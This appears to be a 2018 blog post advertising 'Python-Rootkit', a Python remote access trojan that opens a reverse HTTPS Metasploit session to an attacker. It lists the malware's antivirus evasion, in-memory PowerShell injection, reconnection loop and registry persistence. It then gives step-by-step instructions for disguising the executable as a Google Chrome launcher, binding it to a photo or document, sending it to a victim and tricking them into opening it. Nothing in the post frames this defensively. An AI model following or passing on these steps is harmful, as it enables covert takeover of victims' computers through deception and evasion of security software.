backdoorpost exploitationpowershellrootkit
Python-Rootkit - Python Remote Administration Tool (RAT) to gain meterpreter session
Umut
March 9, 2018
0 comments
This is a full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windowsmachine which will establish a reverse https Metasploit connection to your listening machine.
ViRu5 life cycle
- Bypass all anti-virus.
- Inject a malicius powershell script into memory.
- Establish a reverse https connection to attacker machine.
- Check every 10 seconds and make sure that the connection is still exist, If not it will re-establish a new connection.
- Add a startup register key to re-connect to attacker after reboot.
Steps
- Update viRu5/source.py parameters with your lhost and lport
- Change source.py name to GoogleChromeAutoLaunch.py
- Add GoogleChromeAutoLaunch.py, setup.py and your icon as icon.ico to c:\python27 dir
- From cmd do
cd c:\python27 python setup.py py2exe
- Find the RAT exe file in Dist dir.
- Blind it with any photo, pdf, word or any kind of files
- Send it to the victim
- Use your social engineer skills to make him open the file
- You will recieve a reverse https metasoplit connection :)
Testing on
- Windows 7 32bit
- Winodws 7 64bit
- Widowns 8 32bit
- Windows 8 64bit
- Windows 8.1 32bit
- Windows 8.1 64 bit
- Windows 10 32bit
- Windows 10 64bit
Ad